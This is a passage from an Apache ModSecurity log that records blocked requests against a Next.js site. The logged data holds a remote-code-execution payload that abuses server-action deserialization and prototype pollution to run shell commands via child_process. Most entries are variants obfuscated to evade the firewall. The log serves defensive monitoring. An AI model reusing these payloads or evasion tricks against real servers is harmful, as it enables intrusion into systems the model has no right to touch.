"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dpiQAAAQ0"] [Sun Apr 05 15:42:35.525932 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:41966] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dpigAAAQs"] [Sun Apr 05 15:42:35.525971 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:41982] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dpiwAAAQY"] [Sun Apr 05 15:42:35.534904 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:42000] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dpjAAAAQU"] [Sun Apr 05 15:42:35.565556 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:42016] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpjgAAARI"] [Sun Apr 05 15:42:35.565566 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:42028] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy7xQSOrq_iRTM7dpjQAAAQ4"] [Sun Apr 05 15:42:35.566558 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:42036] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpjwAAAQI"] [Sun Apr 05 15:42:35.620009 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:42098] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy5c83uMXRUE9zvQSzgAAAcc"] [Sun Apr 05 15:42:35.620182 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:42114] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy7xQSOrq_iRTM7dpkAAAAQo"] [Sun Apr 05 15:42:35.620217 2026] [:error] [pid 1503:tid 1539] [client 172.94.9.253:42072] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy0I7AjfUQYCN-J7DjAAAANc"] [Sun Apr 05 15:42:35.620842 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:42038] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy5c83uMXRUE9zvQSzwAAAc8"] [Sun Apr 05 15:42:35.620851 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:42082] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpkQAAARY"] [Sun Apr 05 15:42:35.631759 2026] [:error] [pid 31198:tid 31270] [client 172.94.9.253:42074] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmyzT5TgrBR8xRnfXA7AAAAVI"] [Sun Apr 05 15:42:35.631808 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:42042] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy5c83uMXRUE9zvQS0AAAAcY"] [Sun Apr 05 15:42:35.632048 2026] [:error] [pid 1503:tid 1521] [client 172.94.9.253:42122] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmy0I7AjfUQYCN-J7DjQAAAMw"] [Sun Apr 05 15:42:35.632371 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:42058] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpkgAAAQU"] [Sun Apr 05 15:42:35.644492 2026] [:error] [pid 31198:tid 31273] [client 172.94.9.253:42116] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmyzT5TgrBR8xRnfXA7QAAAVU"] [Sun Apr 05 15:42:35.745294 2026] [:error] [pid 23077:tid 23100] [client 172.94.9.253:42226] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy5c83uMXRUE9zvQS0gAAAdE"] [Sun Apr 05 15:42:35.745395 2026] [:error] [pid 31198:tid 31264] [client 172.94.9.253:42192] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmyzT5TgrBR8xRnfXA7gAAAUw"] [Sun Apr 05 15:42:35.749075 2026] [:error] [pid 1503:tid 1518] [client 172.94.9.253:42218] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 